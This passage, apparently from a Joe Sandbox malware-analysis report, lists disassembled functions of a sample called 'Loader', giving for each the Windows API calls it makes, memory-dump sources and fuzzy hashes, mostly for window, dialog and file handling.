                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                                Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 184305955-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                                                                                                                                                                                                                                                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                                Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                                • String ID: F$N$open
                                                                                                                                                                                                                                                                                                                • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                                Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                                • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                                • Opcode ID: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                                Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: @bG$RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\")
                                                                                                                                                                                                                                                                                                                • API String ID: 3734993849-1676250096
                                                                                                                                                                                                                                                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                                Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
